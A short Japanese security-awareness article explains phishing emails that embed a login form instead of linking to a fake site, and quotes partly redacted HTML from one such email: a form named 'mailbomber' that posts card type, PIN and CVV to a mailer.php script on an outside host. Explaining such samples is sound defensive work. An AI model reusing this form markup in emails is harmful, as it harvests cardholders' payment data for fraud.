偽サイトにジャンプしないフィッシング
最近は少なくなった偽サイトにジャンプしないフィッシング。一般的なフィッシングでは、メール本文に偽サイトへのリンクがあり、クリックするとクレジットカード番号などの個人情報を入力させる偽サイトに接続する。
しかし、偽サイトにジャンプしないフィッシングの手口では、メールに偽サイトへのリンクは存在せず、入力フォームと送信ボタンやログインボタンがある。入力フォームにカード情報などを入力して[Log On]ボタンを押すと、入力した情報が偽サイトに送信される。
メールのHTMLソースはこんな感じになっている(一部伏せ字)。
<FORM name=mailbomber action="http://members.lycos.co.uk/xxxxxxxxxxxxxxx/mailer.php" method=post> <TABLE cellSpacing=0 cellPadding=0 width="87%" border=0> <TBODY> <TR vAlign=top> <TD vAlign=bottom width="100%" height=28> <TABLE cellSpacing=0 cellPadding=0 width="1022" border=0> (中略) <SELECT name=cardtype> <OPTION value="" selected>--Card Type--</OPTION> <OPTION value=Credit>Credit</OPTION> <OPTION value=Debit>Debit</OPTION></SELECT> </FONT></P></TD></TR> <TR borderColor=#111111> <TD width=12 bgColor=#ffffff height=35> </TD> <TD width=175 bgColor=#ffffff height=35><FONT face="Verdana, Arial, Helvetica, sans-serif" size=2>(Required) <B>Credit/Debit card PIN</B></FONT></TD> <TD width=593 height=35><FONT face="Verdana, Arial, Helvetica, sans-serif"><B> <INPUT type=password maxLength=6 size=4 name=pin> </B></FONT></TD></TR> <TR borderColor=#111111> <TD width=12 bgColor=#ffffff height=35> </TD> <TD width=175 bgColor=#ffffff height=35><FONT face="Verdana, Arial, Helvetica, sans-serif" size=2>(Required) <B>CVV</B></FONT></TD> <TD width=593 height=35><FONT face="Verdana, Arial, Helvetica, sans-serif"><B> <INPUT maxLength=4 size=6 name=cvv> </B><FONT size=1>3 digits for Visa , MasterCard , Discover | 4 digits for American Express </FONT></FONT></TD></TR>